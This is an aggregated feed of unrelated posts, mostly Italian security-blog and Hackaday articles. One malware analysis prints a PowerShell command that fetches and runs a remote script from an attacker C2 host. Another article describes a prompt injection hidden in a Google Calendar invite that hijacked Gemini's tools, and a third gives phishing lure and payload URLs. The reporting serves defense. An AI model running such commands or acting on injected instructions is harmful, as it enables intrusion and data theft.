Hackaday Podcast Episode 333: Nightmare Whiffletrees, 18650 Safety, and a Telephone Twofer
This week, Hackaday’s Elliot Williams and Kristina Panos met up over the tubes to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
In Hackaday news, get your Supercon 2025 tickets while they’re hot! Also, the One Hertz Challenge ticks on, but time is running out. You have until Tuesday, August 19th to show us what you’ve got, so head over to Hackaday.IO and get started now. Finally, its the end of eternal September as AOL discontinues dial-up service after all these years.
On What’s That Sound, Kristina got sort of close, but this is neither horseshoes nor hand grenades. Can you get it? If so, you could win a limited edition Hackaday Podcast t-shirt!
After that, it’s on to the hacks and such, beginning with a talking robot that uses typewriter tech to move its mouth. We take a look at hacking printed circuit boards to create casing and instrument panels for a PDP-1 replica. Then we explore a fluid simulation business card, witness a caliper shootout, and marvel at one file in six formats. Finally, it’s a telephone twofer as we discuss the non-hack-ability of the average smart phone, and learn about what was arguably the first podcast.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
html5-player.libsyn.com/embed/…
Download in DRM-free MP3 and savor at your leisure.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 333 Show Notes:
News:
- Get Your Tickets For Supercon 2025 Now!
- Announcing The 2025 Hackaday One Hertz Challenge
- End Of The Eternal September, As AOL Discontinues Dial-Up
What’s that Sound?
- Think you know what the sound is? Fill out the form for your shot at a shirt.
Interesting Hacks of the Week:
- Josef Prusa Warns Open Hardware 3D Printing Is Dead
- Continuous-Path 3D Printed Case Is Clearly Superior
- FullControl – Unconstrained Design
- The Trials Of Trying To Build An Automatic Filament Changer
- Talking Robot Uses Typewriter Tech For Mouth
- Hacking Printed Circuit Board To Create Casing And Instrument Panels
- That’s No Moon, Er, Selectric
- The WHY 2025 Badge And Its 18650s
- LEDs That Flow: A Fluid Simulation Business Card
Quick Hacks:
- Elliot’s Picks:
- Calipers: Do You Get What You Pay For?
- Building A Trash Can Reverb
- Coping With Disappearing Capacitance In A Buck Converter
- One File, Six Formats: Just Change The Extension
- Kristina’s Picks:
- 2025 One Hertz Challenge: Abstract Aircraft Sculpture Based On Lighting Regulations
- Don’t Say This DIY Diskette Was A Flop
- Digital Etch-A-Sketch Also Plays Snake
Can’t-Miss Articles:
hackaday.com/2025/08/15/hackad…
Porterà qualcosa di buono l’incontro tra Trump e Putin in Alaska?
@Giornalismo e disordine informativo
articolo21.org/2025/08/portera…
Tra poco Trump e Putin si guarderanno negli occhi in #Alaska, mentre il mondo assisterà in finestra con il fiato sospeso e le dita incrociate a questa loro riunione, sperando che
Why Lorde’s Clear CD has so Many Playback Issues
Despite the regularly proclaimed death of physical media, new audio albums are still being published on CD and vinyl. There’s something particularly interesting about Lorde’s new album Virgin however — the CD is a completely clear disc. Unfortunately there have been many reports of folks struggling to get the unique disc to actually play, and some sharp-eyed commentators have noted that the CD doesn’t claim to be Red Book compliant by the absence of the Compact CD logo.The clear Lorde audio CD in all its clear glory. (Credit: Adrian’s Digital Basement, YouTube)
To see what CD players see, [Adrian] of Adrian’s Digital Basement got out some tools and multiple CD players to dig into the issue. These players range from a 2003 Samsung, a 1987 NEC, and a cheap portable Coby player. But as all audio CDs are supposed to adhere to the Red Book standard, a 2025 CD should play just as happily on a 1980s CD player as vice versa.
The first step in testing was to identify the laser pickup (RF) signal test point on the PCB of each respective player. With this hooked up to a capable oscilloscope, you can begin to see the eye pattern forming. In addition to being useful with tuning the CD player, it’s also an indication of the signal quality that the rest of the CD player has to work with. Incidentally, this is also a factor when it comes to CD-R compatibility.
While the NEC player was happy with regular and CD-R discs, its laser pickup failed to get any solid signal off the clear Lorde disc. With the much newer Samsung player (see top image), the clear CD does play, but as the oscilloscope shot shows, it only barely gets a usable signal from the pickup. Likewise, the very generic Coby player also plays the audio CD, which indicates that any somewhat modern CD player with its generally much stronger laser and automatic gain control ought to be able to play it.
That said, it seems that very little of the laser’s light actually makes it back to the pickup’s sensor, which means that the gain gets probably cranked up to 11, and with that its remaining lifespan will be significantly shortened. Ergo it’s probably best to just burn that CD-R copy of the album and listen to that instead.
youtube.com/embed/s3IvVUh3mt4?…
CrowdStrike Global Threat Report 2025: l’anno dell’avversario intraprendente
CrowdStrike ha pubblicato il suo Global Threat Report 2025, che documenta un balzo in avanti nel comportamento dei criminali informatici e dei gruppi statali. Gli esperti definiscono il 2024 “l’anno dell’avversario intraprendente“: gli aggressori si comportano come aziende mature, introducendo innovazioni, costruendo catene di approvvigionamento resilienti e utilizzando attivamente l’intelligenza artificiale .
L’indicatore principale – il tempo di breakout, ovvero il periodo che intercorre tra la penetrazione iniziale e l’inizio del movimento laterale attraverso la rete – è stato ridotto al minimo storico: una media di 48 minuti contro i 62 minuti dell’anno precedente. Il record assoluto è di 51 secondi, il che di fatto priva i difensori del tempo necessario per reagire.
Nel 79% dei casi rilevati, gli aggressori non hanno utilizzato file dannosi, ma hanno agito tramite strumenti di amministrazione legittimi e operazioni manuali (hands-on-keyboard). Questo approccio consente loro di camuffarsi come una normale attività utente e di aggirare l’EDR . Gli strumenti di gestione remota (RMM) sono particolarmente utilizzati, tra cui Microsoft Quick Assist e TeamViewer.
Gli attacchi di vishing sono esplosi nell’ultimo anno, con un aumento del 442% nella seconda metà del 2024 rispetto alla prima. I gruppi CURLY SPIDER, CHATTY SPIDER e PLUMP SPIDER hanno utilizzato attivamente le telefonate come vettore principale, spesso in combinazione con lo “spam bombing“, ovvero l’invio massivo di reclami che fungono da pretesto per una chiamata “dall’assistenza”. In alcuni casi, questi schemi si sono conclusi con l’installazione di backdoor e il lancio del ransomware Black Basta .
Si sta diffondendo anche l’ingegneria sociale nell’help desk, in cui gli aggressori si spacciano per dipendenti aziendali e convincono gli operatori a reimpostare le password o a disattivare l’autenticazione a più fattori. Questa tattica è utilizzata, tra gli altri, da SCATTERED SPIDER ed è diventata uno dei metodi chiave per compromettere account cloud e applicazioni SaaS.
Il 2024 ha segnato una svolta nell’uso dell’IA Gen da parte di criminali informatici e attori statali. I modelli LLM sono stati utilizzati per:
- creazione di profili e immagini falsi (ad esempio, il famoso CHOLLIMA nordcoreano);
- generare e-mail e siti Web di phishing che hanno mostrato un CTR superiore del 54% rispetto ai messaggi scritti da esseri umani;
- deepfake negli schemi BEC: in un caso, sono stati rubati 25,6 milioni di dollari tramite questi metodi;
- scrivere script e strumenti dannosi;
- creazione di siti “deco” nelle campagne NITRO SPIDER.
È emerso anche un nuovo fenomeno: LLMJacking : il furto dell’accesso ai servizi di intelligenza artificiale aziendali nel cloud per rivenderli o utilizzarli in altri attacchi.
Il numero di attacchi con tracce cinesi è aumentato in media del 150% e del 200-300% nei settori finanziario, mediatico, manifatturiero e ingegneristico. Sono stati identificati nuovi gruppi specializzati: LIMINAL PANDA, LOCKSMITH PANDA, OPERATOR PANDA, VAULT PANDA ed ENVOY PANDA, ognuno con la propria specializzazione di nicchia, dalle telecomunicazioni e dalla finanza alle agenzie diplomatiche. Gli operatori cinesi utilizzano attivamente reti ORB composte da centinaia e migliaia di dispositivi hackerati per nascondere il traffico e utilizzano congiuntamente strumenti precedentemente unici, come il malware KEYPLUG.
Il famoso gruppo CHOLLIMA ha implementato campagne su larga scala utilizzando falsi dipendenti IT che ottengono lavoro presso aziende straniere, ricevono dispositivi aziendali e li consegnano a “laboratori di laptop” per installare backdoor. CrowdStrike ha registrato 304 incidenti che li hanno coinvolti, il 40% dei quali riguardava minacce interne.
Gli attacchi al cloud sono aumentati del 26%. Il 35% di questi è iniziato con la compromissione di account attivi, mentre gli aggressori preferiscono non modificare le password per non destare allarme. Vengono utilizzati sia il furto di credenziali tramite infostealer (Stealc, Vidar) sia l’abuso di connessioni attendibili tra aziende.
Una parte significativa degli attacchi si basa sull’utilizzo concatenato di exploit e sull’abuso di funzioni software legittime. Ad esempio, OPERATOR PANDA ha utilizzato una serie di vulnerabilità in Cisco IOS per attaccare società di telecomunicazioni e di consulenza negli Stati Uniti.
CrowdStrike prevede che la velocità degli attacchi e l’uso diffuso dell’intelligenza artificiale continueranno ad aumentare, soprattutto negli ambienti di social engineering e cloud. Per proteggersi da queste minacce, gli esperti raccomandano di dare priorità alla protezione dell’identità, implementare una pianificazione proattiva delle patch, rafforzare i controlli degli account cloud e utilizzare strumenti di threat hunting basati sull’intelligenza artificiale.
L'articolo CrowdStrike Global Threat Report 2025: l’anno dell’avversario intraprendente proviene da il blog della sicurezza informatica.
Dopo il bucato, Figure 02 ora piega il bucato. Ma per ora dovrai continuare a farlo da solo
Solamente due settimane fa, il robot umanoide prodotto da Figure ha destato in noi grande meraviglia, quando con destrezza ha preso degli indumenti da un paniere dei panni sporchi e li ha collocati all’interno di una lavatrice. Tutto ciò è apparso estremamente sorprendente.
Un futuro in cui gli esseri umani saranno liberi da questo onere tedioso è mostrato in un nuovo video da Figure, dove si vede lo stesso robot che sistema asciugamani freschi di bucato, per poi metterli da parte piegati.
Today we unveiled the first humanoid robot that can fold laundry autonomouslySame exact Helix architecture, only new data pic.twitter.com/0iEToKfETD
— Figure (@Figure_robot) August 12, 2025
Grazie a un nuovo set di dati specifico per la piegatura della biancheria, Figura02 adotta lo stesso modello Helix Vision Language Action (VLA) già impiegato dall’azienda nelle operazioni di logistica industriale, con l’obiettivo di guidare il processo in modo efficiente.
L’azienda tecnologica con sede in California ha dichiarato di aver realizzato il primo robot umanoide in grado di piegare il bucato “in modo completamente autonomo”, un’affermazione che sicuramente farà sì che milioni di persone in tutto il mondo si chiedano all’istante: “Allora, dove posso trovarne uno?”.
Il robot svolge l’operazione di pulizia in piena autonomia, senza necessità di interventi manuali o direttive specialistiche, grazie all’implementazione di una rete neurale a estremità connesse.
Come potete vedere, il robot usa mani multi-dita per raccogliere con competenza gli asciugamani da una pila. Esegue anche diverse strategie di piegatura, recupera errori come afferrare più asciugamani contemporaneamente ed esegue manipolazioni di precisione, proprio come un essere umano.
Il video dimostra progressi concreti in uno dei settori che gli ingegneri robotici trovano ancora estremamente impegnativi: la manipolazione di oggetti, soprattutto quelli morbidi e flessibili. In effetti, l’impressionante capacità del robot di maneggiare l’umile asciugamano sembra un passo avanti entusiasmante verso la capacità di tali macchine di gestire altri oggetti non rigidi, aprendole a una pletora di altri compiti in una gamma più ampia di contesti.
Nonostante le attenzioni di Figure siano ad oggi focalizzate sull’utilizzo del suo robot dalle sembianze umane all’interno di contesti lavorativi, prossimamente esso verrà collaudato anche nelle abitazioni private, aspetto che risulterà gradito a tutte le persone che non amano le attività di lavanderia.
“Piegare il bucato può sembrare banale per una persona, ma è uno dei compiti di manipolazione più impegnativi per un robot umanoide”, ha affermato Figure in un post sul suo sito web. “Gli asciugamani sono deformabili, cambiano forma in continuazione, si piegano in modo imprevedibile e tendono a stropicciarsi o aggrovigliarsi. Non esiste una geometria fissa da memorizzare, né un singolo punto di presa ‘corretto’. Anche un leggero scivolamento di un dito può far arricciare o cadere il tessuto. Il successo richiede più che una semplice visione accurata del mondo: richiede un controllo preciso e coordinato delle dita per tracciare bordi, pizzicare angoli, levigare superfici e adattarsi in tempo reale”.
Figure non ha ancora fornito dettagli sui prezzi e sugli acquisti per i singoli clienti, quindi, almeno per il momento, il bucato lo dobbiamo continuare a fare noi.
L'articolo Dopo il bucato, Figure 02 ora piega il bucato. Ma per ora dovrai continuare a farlo da solo proviene da il blog della sicurezza informatica.
Libsophia #21 – Tocqueville con Ermanno Ferretti
@Politica interna, europea e internazionale
L'articolo Libsophia #21 – Tocqueville con Ermanno Ferretti proviene da Fondazione Luigi Einaudi.
This Week in Security: The AI Hacker, FortMajeure, and Project Zero
One of the hot topics currently is using LLMs for security research. Poor quality reports written by LLMs have become the bane of vulnerability disclosure programs. But there is an equally interesting effort going on to put LLMs to work doing actually useful research. One such story is [Romy Haik] at ULTRARED, trying to build an AI Hacker. This isn’t an over-eager newbie naively asking an AI to find vulnerabilities, [Romy] knows what he’s doing. We know this because he tells us plainly that the LLM-driven hacker failed spectacularly.
The plan was to build a multi-LLM orchestra, with a single AI sitting at the top that maintains state through the entire process. Multiple LLMs sit below that one, deciding what to do next, exactly how to approach the problem, and actually generating commands for those tools. Then yet another AI takes the output and figures out if the attack was successful. The tooling was assembled, and [Romy] set it loose on a few intentionally vulnerable VMs.
As we hinted at up above, the results were fascinating but dismal. This LLM successfully found one Remote Code Execution (RCE), one SQL injection, and three Cross-Site Scripting (XSS) flaws. This whole post is sort of sneakily an advertisement for ULTRARED’s actual automated scanner, that uses more conventional methods for scanning for vulnerabilities. But it’s a useful comparison, and it found nearly 100 vulnerabilities among the collection of targets.
The AI did what you’d expect, finding plenty of false positives. Ask an AI to describe a vulnerability, and it will glad do so — no real vulnerability required. But the real problem was the multitude of times that the AI stack did demonstrate a problem, and failed to realize it. [Romy] has thoughts on why this attempt failed, and two points stand out. The first is that while the LLM can be creative in making attacks, it’s really terrible at accurately analyzing the results. The second observation is one of the most important observations to keep in mind regarding today’s AIs. It doesn’t actually want to find a vulnerability. One of the marks of security researchers is the near obsession they have with finding a great score.
DARPA
Don’t take the previous story to mean that AI will never be able do vulnerability research, or even that it’s not a useful tool right now. The US DARPA sponsored a competition at this year’s DEF CON, and another security professional pointed out that Buttercup AI Cyber REasoning System (CRS) is the second place winner. It’s now available as an Open Source project.
This challenge was a bit different from an open-ended attack on a VM. In the DARPA challenge, the AI tools are given specific challenges, and a C or Java codebase, and told to look for problems. Buttercup uses an AI-guided fuzzing approach, and one of the notable advantages with this challenge is that often times a vulnerability will cause an outright crash in the program, and that’s hard to miss, even for an AI.
Team Atlanta took first place, and has some notes on their process. Their first-place finish was almost derailed from the start, due to a path checking rule to comply with contest rules. The AI tools were provided fuzzing harnesses that they were not allowed to modify, and the end goal was for the AIs to actually write patches to fix the issues found. All of the challenges were delivered inside directories containing ossfuzz
, triggering the code that protected against breaking the no modification rules. A hasty code hacking session right at the last moment managed to clear this, and saved the entire competition.
FortMajeure
We have this write-up from [0x_shaq], finding a very fun authentication bypass in FortiWeb. The core problem is the lack of validation on part of the session cookie. This cookie has a couple of sections that we care about. The Era
field is a single digit integer that seems to indicate a protocol version or session type, while the Payload
and AuthHash
fields are the encrypted session information and signed hash for verification.
That Era
field is only ever expected to be a 0 or a 1, but the underlying code processes the other eight possible values the same way: by accessing the nth element of an array, even if the array doesn’t actually have that many initialized elements. And one of the things that array will contain is the encryption/signing key for the session cookie. This uninitialized memory is likely to be mostly or entirely nulls, making for a very predictable session key.
Project Zero
Google has a couple interesting items on their Project Zero blog. The first is from late July, and outlines a trial change to disclosure timelines. The problem here is that a 90 day disclosure gives the immediate vendor plenty of time to patch an issue, but even with a 30 day extension, it’s a race for all of the downstream users to apply, test, and distribute the fix. The new idea is to add a one week vulnerability pre-disclosure. One week after a vulnerability is found, it’s existence is added to the chart of upcoming releases. So if you ship Dolby’s Unified Decoder in a project or product, mark your calendar for September 25, among the other dozen or so pre-released vulnerabilities.
The second item from Project Zero is a vulnerability found in Linux, that could be triggered from within the Chrome renderer sandbox. At the heart of the matter is the Out Of Band byte that could be sent as a part of Unix Sockets. This is a particularly obscure feature, and yet enabled by default, which is a great combination for security research.
The kernel logic for this feature could get confused when dealing with multiples of these one-byte messages, and eventually free kernel memory while a pointer is still pointing to it. Use the recv()
syscall again on that socket, and the freed memory is accessed. This results in a very nice kernel memory read primitive, but also a very constrained write primitive. In this case, it’s to increment a single byte, 0x44 bytes into the now-freed data structure. Turning this into a working exploit was challenging but doable, and mainly consisted of constructing a fake object in user-controlled memory, triggering the increment, and then using the socket again to coerce the kernel into using the fake object.
Bits and Bytes
Cymulate has the story of a Microsoft NTLM patch that wasn’t quite enough. The original problem was that a Windows machine could be convinced to connect to a remote NTLM server to retrieve a .ico
file. The same bug can be triggered by creating a shortcut that implies the .ico is embedded inside the target binary itself, and put that on a remote SMB share. It’s particularly bad because this one will acess the server, and leak the NTLM hash, just by displaying the icon on the decktop.
Xerox FreeFlow Core had a pair of exploits, the more serious of which could enable an unauthenticated RCE. The first is an XML External Entity (XXE) injection issue, where a user request could result in the server fetching remote content while processing the request. The more serious is a simple file upload with path traversal, making for an easy webshell dropper.
Claroty’s Team82 dug into the Axis Communications protocol for controlling security cameras, and found some interesting items. The Axis.Remoting protocol uses mutual TLS, which is good. But those are self-signed certificates that never validated, allowing for trivial man in the middle. The most serious issue was a JSON deserialization vulnerability, allowing for RCE on the service itself. Patches are available, and are particularly important for Axis systems that are available on the open Internet.
Hai risposto su Teams al supporto IT? Complimenti! Il Trojan è nel PC con diritti superiori ai tuoi
Il team di ricerca di Trustwave SpiderLabs ha identificato una nuova ondata di attacchi EncryptHub che combinano l’errore umano e lo sfruttamento di una vulnerabilità nella Microsoft Management Console. Gli operatori si spacciano per personale di supporto, contattano il personale tramite Microsoft Teams e poi convincono il “cliente” ad aprire l’accesso remoto ed eseguire una serie di comandi, per poi distribuire il payload del bug CVE-2025-26633, nota come MSC EvilTwin.
Parallelamente, il gruppo utilizza canali di distribuzione non standard, tra cui la piattaforma di supporto Brave, il che complica il filtraggio del traffico e l’analisi degli incidenti. I report riportano anche altri nomi dello stesso team: LARVA-208 e Water Gamayun; in precedenza, il gruppo era stato associato ad attacchi contro sviluppatori Web3 e abusi della piattaforma Steam e, a febbraio, erano 618 le organizzazioni compromesse in tutto il mondo.
Il primo passo è l’ingegneria sociale . La vittima riceve una richiesta Teams da un “addetto IT”, dopodiché l’interlocutore offre insistentemente di avviare una sessione remota e “controllare le impostazioni“. Una volta stabilita la sessione, sulla macchina viene eseguita una riga come questa:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression”
Questa chiamata scarica ed esegue lo script runner.ps1, che prepara un trampolino di lancio per sfruttare la vulnerabilità MMC.
Poi arriva il trucco con i file .msc doppi. Il loader crea due file di console con lo stesso nome: una copia “pulita” viene posizionata nella directory prevista e una copia dannosa viene posizionata nel percorso MUIPath, solitamente la directory en-US. Quando viene avviato lo snap-in legittimo, viene visualizzato il processo mmc.exe e, a causa del bug MSC EvilTwin, cerca prima il file con lo stesso nome in MUIPath. Di conseguenza, il sistema rileva il “mirror” da en-US ed esegue il codice degli aggressori. Sebbene la falla sia stata pubblicamente descritta come zero-day nel marzo 2025, campioni di tali file sono stati riscontrati in attacchi attivi già a febbraio; esiste una patch, ma la ricezione funziona ancora sulle stazioni non patchate.
Dopo aver disposto i doppi, runner.ps1 modifica il contenuto dello snap-in dannoso: il segnaposto htmlLoaderUrl viene sostituito con l’indirizzo del nodo di comando e controllo di EncryptHub, una stringa del tipo hxxps://cjhsbam[.]com/payload/build[.]ps1. Dopo aver ricevuto il collegamento, .msc esegue la fase successiva.
Lo script build.ps1 raccoglie i “finger” di sistema e li invia a C2, registra il meccanismo di esecuzione automatica, gestisce il canale di comunicazione e attende l’esecuzione dell’attività. I comandi vengono ricevuti in forma crittografata (AES), decrittografati localmente ed eseguiti direttamente sul nodo tramite Invoke-Expression. Tra i moduli tipici c’è linfostealer PowerShell Fickle Stealer, che estrae file sensibili, informazioni sull’ambiente e dati del portafoglio crittografico.
Durante l’indagine, sono emersi ulteriori strumenti Go, con i quali gli operatori stanno gradualmente sostituendo gli script di PowerShell. Uno di questi, SilentCrystal, replica la logica del bootloader, ma è compresso in un binario nativo. Innanzitutto, viene creata una cartella di pseudo-sistema “C:WindowsSystem32” con uno spazio dopo la parola Windows, che copia visivamente la directory reale e confonde gli strumenti di sicurezza. Quindi, il campione invia un POST al server di controllo con una “chiave API” hard-coded e un nome file casuale con estensione .zip; in risposta, viene inviato un collegamento legittimo al supporto Brave.
Ai principianti non è consentito caricare allegati su questo sito, il che significa che EncryptHub ha un account con diritti di caricamento. L’archivio dal supporto Brave viene scaricato e decompresso, dopodiché il segnaposto {URI} in WF.msc viene sostituito con l’indirizzo del centro di comando. Successivamente, viene avviato lo standard .msc e, grazie a CVE-2025-26633 , la console rileva la sostituzione dalla directory “false”, eseguendo il codice richiesto.
Un’altra scoperta interessante è un “proxy bookmark” in Go con supporto SOCKS5. Senza parametri, si avvia come client, si connette all'”hosting” degli aggressori utilizzando i dettagli hardcoded nel binario e devia il traffico in un tunnel. Esiste anche una modalità server: viene caricato un file con i dati di autenticazione, viene generato automaticamente un certificato TLS autofirmato (il campo Common Name contiene la riga Reverse Socks e il nome DNS è localhost), dopodiché il processo inizia ad accettare più connessioni, parallelizzando l’elaborazione tramite goroutine. Quando viene stabilita una connessione, l’agente accede a Telegram con lo stato “start”, dove sostituisce il nome utente, il dominio dalla variabile d’ambiente USERDOMAIN, il risultato della verifica dei diritti amministrativi tramite una chiamata di sessione di rete, nonché l’IP pubblico, il geotag e il provider su richiesta a ipinfo.io/json . L’analisi dell’infrastruttura ha mostrato richieste di payload su hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, un altro tassello nel quadro di C2.
L'articolo Hai risposto su Teams al supporto IT? Complimenti! Il Trojan è nel PC con diritti superiori ai tuoi proviene da il blog della sicurezza informatica.
reshared this
FLUG - Migrazione server di posta
firenze.linux.it/2025/08/migra…
Segnalato da Linux Italia e pubblicato sulla comunità Lemmy @GNU/Linux Italia
Lunedì 28 luglio 2025 sulla lista del FLUG è stata annunciata la migrazione al nuovo server di posta sul rinato serverino (nome in codice Coraggio). Stiamo ancora verificando che tutto
Google corregge un bug critico in Gemini che permette di tracciare gli utenti
Gli sviluppatori di Google hanno corretto un bug che consentiva agli inviti dannosi di Google Calendar di prendere il controllo remoto degli agenti Gemini in esecuzione sul dispositivo della vittima e di rubare i dati dell’utente. Gemini è il Large Language Model (LLM) di Google integrato nelle app Android.
I ricercatori di SafeBreach hanno scoperto che inviando alla vittima un invito con un prompt di Google Calendar incorporato (che poteva essere nascosto, ad esempio, nel titolo dell’evento), gli aggressori erano in grado di estrarre il contenuto dell’email e le informazioni del calendario, tracciare la posizione dell’utente, controllare i dispositivi della smart home tramite Google Home, aprire app Android e avviare videochiamate Zoom.
Nel loro rapporto, gli esperti sottolineano che un attacco di questo tipo non richiedeva l’accesso a un modello white-box e non veniva bloccato dai filtri rapidi e da altri meccanismi di difesa Gemini.
L’attacco inizia inviando alla vittima un invito a un evento tramite Google Calendar, il cui titolo contiene un messaggio dannoso. Una volta che la vittima interagisce con Gemini, ad esempio chiedendo “Quali eventi sono programmati sul mio calendario oggi?”, l’IA scaricava un elenco di eventi da Calendar, incluso quello dannoso.
Di conseguenza, il prompt dannoso è diventato parte della finestra di contesto di Gemini e l’assistente lo ha percepito come parte della conversazione, senza rendersi conto che l’istruzione era ostile all’utente.
A seconda del prompt utilizzato, gli aggressori potrebbero avviare vari strumenti o agenti per eliminare o modificare gli eventi del Calendario, aprire URL per determinare l’indirizzo IP della vittima, partecipare alle chiamate Zoom, utilizzare Google Home per controllare i dispositivi e accedere alle e-mail ed estrarre dati.
I ricercatori hanno osservato che un aggressore potrebbe inviare sei inviti, includendo il prompt dannoso solo nell’ultimo, per garantire che l’attacco funzioni mantenendo comunque un certo livello di furtività.
Il problema è che Calendar Events mostra solo gli ultimi cinque eventi, mentre gli altri sono nascosti sotto il pulsante “Mostra altro“. Tuttavia, quando richiesto, Gemini li analizza tutti, incluso quello dannoso. Allo stesso tempo, l’utente non vedrà il nome dannoso a meno che non espanda manualmente l’elenco degli eventi.
Google ha risposto al rapporto SafeBreach affermando che l’azienda sta continuamente implementando nuove difese per Gemini per contrastare un’ampia gamma di attacchi, e che molte delle misure sono pianificate per un’implementazione imminente o sono già in fase di implementazione.
L'articolo Google corregge un bug critico in Gemini che permette di tracciare gli utenti proviene da il blog della sicurezza informatica.
La gioia e la frustrazione di non essere più su Facebook
Io non desisto, anche rinfrancato dal fatto che l'affidabilità di Meta è sempre più in declino.
Mia moglie aveva disattivato il suo account Facebook anni fa e da qualche settimana aveva notato riapparire notifiche via mail. Chiaramente il suo account era stato hackerato.
Per settimane abbiamo provato a riprenderne il controllo e solo oggi ci siamo riusciti. Ore e ore perse dietro questi incompetenti.
In pratica mia moglie ogni 5 giorni, oltre alle usuali notifiche, riceveva un messaggio con un codice numerico per recuperare la password. Questo probabilmente era l'hacker che le impediva in questo modo di attivare la funzione di recupero della password. Infatti quando andava per attivarla, le diceva "Sembra che tu stia usando in modo errato questa funzione andando troppo velocemente. Ti è stato temporaneamente impedito di usarla.". Ma la cosa assurda è che esiste anche un link di Facebook per segnalare che il proprio account è stato hackerato ed utilizzandolo si riceveva la stessa risposta "Sembra che tu stia usando in modo errato questa funzione...", il che è completamente assurdo perché è proprio quello che gli hacker desiderano per impedire che qualcuno possa recuperare il proprio account!
Il tentativo che finalmente è andato in porto è stato quello di cercare di creare un account con la stessa e-mail e nome e a quel punto la funzione di recupero della password con l'invio di un codice si è attivata.
Ora il problema sarà riuscire ad entrare (per capire cosa ha fatto l'hacker) senza inchinarsi a 1) pagare dei soldi per non avere la pubblicità o 2) accettare che i propri dati personali vengano usati per pubblicità personalizzata. Ci siamo quasi e poi anche questo account verrà eliminato!
Teletext Around the World, Still
When you mention Teletext or Videotex, you probably think of the 1970s British system, the well-known system in France, or the short-lived US attempt to launch the service. Before the Internet, there were all kinds of crazy ways to deliver customized information into people’s homes. Old-fashioned? Turns out Teletext is alive and well in many parts of the world, and [text-mode] has the story of both the past and the present with a global perspective.
The whole thing grew out of the desire to send closed caption text. In 1971, Philips developed a way to do that by using the vertical blanking interval that isn’t visible on a TV. Of course, there needed to be a standard, and since standards are such a good thing, the UK developed three different ones.
The TVs of the time weren’t exactly the high-resolution devices we think of these days, so the 1976 level one allowed for regular (but Latin) characters and an alternate set of blocky graphics you could show on an expansive 40×24 palette in glorious color as long as you think seven colors is glorious. Level 1.5 added characters the rest of the world might want, and this so-called “World System Teletext” is still the basis of many systems today. It was better, but still couldn’t handle the 134 characters in Vietnamese.
Meanwhile, the French also wanted in on the action and developed Antiope, which had more capabilities. The United States would, at least partially, adopt this standard as well. In fact, the US fragmented between both systems along with a third system out of Canada until they converged on AT&T’s PLP system, renamed as North American Presentation Layer Syntax or NAPLPS. The post makes the case that NAPLPS was built on both the Canadian and French systems.
That was in 1986, and the Internet was getting ready to turn all of these developments, like $200 million Canadian system, into a roaring dumpster fire. The French even abandoned their homegrown system in favor of the World System Teletext. The post says as of 2024, at least 15 countries still maintain teletext.
So that was the West. What about behind the Iron Curtain, the Middle East, and in Asia? Well, that’s the last part of the post, and you should definitely check it out.Japan’s version of teletex, still in use as of the mid-1990s, was one of the most advanced.
If you are interested in the underlying technology, teletext data lives in the vertical blanking interval between frames on an analog TV system. Data had page numbers. If you requested a page, the system would either retrieve it from a buffer or wait for it to appear in the video signal. Some systems send a page at a time, while others send bits of a page on each field. In theory, the three-digit page number can range from 100 to 0x8FF, although in practice, too many pages slow down the system, and normal users can’t key in hex numbers.
For PAL, for example, the data resides in even lines between 6 and 22, or in lines 318 to 335 for odd lines. Systems can elect to use fewer lines. A black signal is a zero, while a 66% white signal is a one, and the data is in NRZ line coding. There is a framing code to identify where the data starts. Other systems have slight variations, but the overall bit rate is around 5 to 6 Mbit/s. Character speeds are slightly slower due to error correction and other overhead.
Honestly, we thought this was all ancient history. You have to wonder which country will be the last one standing as the number of Teletext systems continues to dwindle. Of course, we still have closed captions, but with digital television, it really isn’t the same thing. Can Teletext run Doom? Apparently, yes, if you stretch your definition of success a bit.
Umsetzung der NIS-2-Richtlinie: Bundestag muss Gesetz zur Cybersicherheit nachbessern
È bastata una ん di troppo! Phishing che impersona Booking.com con la tecnica degli omoglifi
Gli aggressori hanno iniziato a utilizzare un trucco insolito per mascherare i link di phishing, facendoli apparire come indirizzi di Booking.com. La nuova campagna malware utilizza il carattere hiragana giapponese “ん” (U+3093). In alcuni font e interfacce, assomiglia visivamente a una barra, facendo apparire l’URL come un normale percorso sul sito, sebbene in realtà conduca a un dominio falso.
Il ricercatore JAMESWT ha scoperto che nelle e-mail di phishing il collegamento si presenta così:
admin.booking.com/hotel/hotela…
ma in realtà indirizza l’utente a un indirizzo del tipo
Tutto ciò che precede “www-account-booking[.]com” è solo un sottodominio che imita la struttura del sito reale. Il vero dominio registrato appartiene agli aggressori. Cliccandoci sopra, la vittima finisce sulla pagina
www-account-booking[.]com/c.php?a=0
da cui viene scaricato un file MSI dannoso dal nodo CDN updatessoftware.b-cdn[.]net.
Secondo l’analisi di MalwareBazaar e ANY.RUN , il programma di installazione distribuisce componenti aggiuntivi, probabilmente infostealer o strumenti di accesso remoto.
La tecnica si basa sull’uso di omoglifi ovvero simboli che sembrano altri ma appartengono ad altri alfabeti o set Unicode. Tali simboli sono spesso utilizzati in attacchi omografi e phishing. Un esempio è la “O” cirillica (U+041E), che è quasi indistinguibile dalla “O” latina (U+004F). Nonostante gli sviluppatori di browser e servizi aggiungano protezioni contro tali sostituzioni, gli attacchi continuano a verificarsi.
Non è la prima volta che Booking.com diventa un’esca per il phishing. A marzo, Microsoft Threat Intelligence ha segnalato email mascherate da servizio di prenotazione che utilizzavano la tecnica ClickFix per infettare i computer dei dipendenti degli hotel. E ad aprile, i ricercatori di Malwarebytes hanno segnalato uno schema simile.
Tuttavia, l’uso di omoglifi come “ん” può ingannare anche gli utenti più attenti, quindi è importante integrare la cautela con un software antivirus aggiornato in grado di bloccare il download di contenuti dannosi.
L'articolo È bastata una ん di troppo! Phishing che impersona Booking.com con la tecnica degli omoglifi proviene da il blog della sicurezza informatica.
reshared this
reshared this
Ok, cerchiamo di essere seri.
Se si vuole capire di chi si sta facendo gli interessi e come basta leggere “Dall’economia dell’ occupazione all’economia del genocidio” della relatrice speciale sulla situazione dei diritti umani nei territori palestinesi occupati dal 1967.
È un esempio estremo?
È un esempio circoscritto?
No.
Svela interessi, meccanismi e intrecci che ci riguardano e non solo umanamente
